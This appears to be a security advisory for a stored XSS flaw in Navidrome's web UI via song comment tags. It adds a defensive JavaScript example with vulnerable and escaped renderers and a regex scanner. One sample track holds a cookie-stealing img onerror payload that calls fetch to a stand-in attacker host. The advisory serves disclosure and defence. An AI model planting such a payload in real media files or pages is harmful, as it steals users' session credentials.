CVE-2026-25578: Navidrome has XSS via comment from song metadata
A stored cross-site scripting (XSS) vulnerability in the Navidrome web frontend allows an attacker to inject script through the comment metadata tag of a song. When the UI renders that comment for a logged-in user, the injected script runs in that user's browser session and can be used to exfiltrate the user's credentials.
To exploit the vulnerability, the attacker's maliciously crafted audio file has to be added to a music library that Navidrome scans. The fix commit and the v0.60.0 release that contains it are listed in the references below.
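The following is an added example, not Navidrome's code and not taken from the advisory or the fix commit. It shows the generic pattern behind this class of bug (untrusted tag metadata concatenated into HTML) beside the hardened form (entity-escaping before the string reaches markup), plus a coarse operator-side check for locating crafted comment tags in a library that was indexed before the upgrade. Function names, the regex heuristic and the sample track records are all assumptions constructed for illustration.

```javascript
// Added example (not Navidrome's code). Demonstrates the stored-XSS pattern
// the advisory describes: an untrusted song comment rendered as HTML, next
// to the hardened form. All helper names here are hypothetical.

// Vulnerable pattern: the comment string is spliced straight into markup,
// so a tag value such as "<img src=x onerror=...>" becomes live HTML and
// its handler runs with the viewing user's session.
function renderCommentUnsafe(comment) {
  return `<div class="comment">${comment}</div>`;
}

// Hardened form: escape the five HTML-significant characters before the
// value is placed into markup. In React this is what plain {comment}
// interpolation already does; dangerouslySetInnerHTML or manual innerHTML
// assignment bypasses it.
function escapeHtml(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(s).replace(/[&<>"']/g, (c) => map[c]);
}

function renderCommentSafe(comment) {
  return `<div class="comment">${escapeHtml(comment)}</div>`;
}

// Operator-side check: flag library entries whose comment tag contains a
// tag opener, a javascript: URL or an on*= handler attribute. This is a
// coarse heuristic (it will also flag harmless formatting like <b>), meant
// for triage of files that were scanned before the fixed version was deployed.
const MARKUP_RE = /<\s*[a-z!\/]|javascript:|on[a-z]+\s*=/i;

function findSuspiciousComments(tracks) {
  return tracks
    .filter((t) => MARKUP_RE.test(t.comment || ''))
    .map((t) => t.path);
}

// Constructed sample metadata records (not real files, not real tag data).
const SAMPLE_TRACKS = [
  { path: 'a.mp3', comment: 'Ripped from CD, 2019' },
  { path: 'b.mp3', comment: '<img src=x onerror="fetch(\'https://attacker.invalid/?c=\'+document.cookie)">' },
  { path: 'c.mp3', comment: 'See <b>liner notes</b>' },
];

// Demonstration when run directly with node.
console.log('unsafe :', renderCommentUnsafe(SAMPLE_TRACKS[1].comment));
console.log('safe   :', renderCommentSafe(SAMPLE_TRACKS[1].comment));
console.log('flagged:', findSuspiciousComments(SAMPLE_TRACKS));
```

The escaping shown is the minimum that makes the rendered string inert inside element content and quoted attributes; it is not a substitute for a Content-Security-Policy, which would have blocked the inline handler in the sample payload even if escaping were missed.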
References
- github.com/advisories/GHSA-rh3r-8pxm-hg4w
- github.com/navidrome/navidrome
- github.com/navidrome/navidrome/commit/d7ec7355c9036d5be659d6ac555c334bb5848ba6
- github.com/navidrome/navidrome/releases/tag/v0.60.0
- github.com/navidrome/navidrome/security/advisories/GHSA-rh3r-8pxm-hg4w
- nvd.nist.gov/vuln/detail/CVE-2026-25578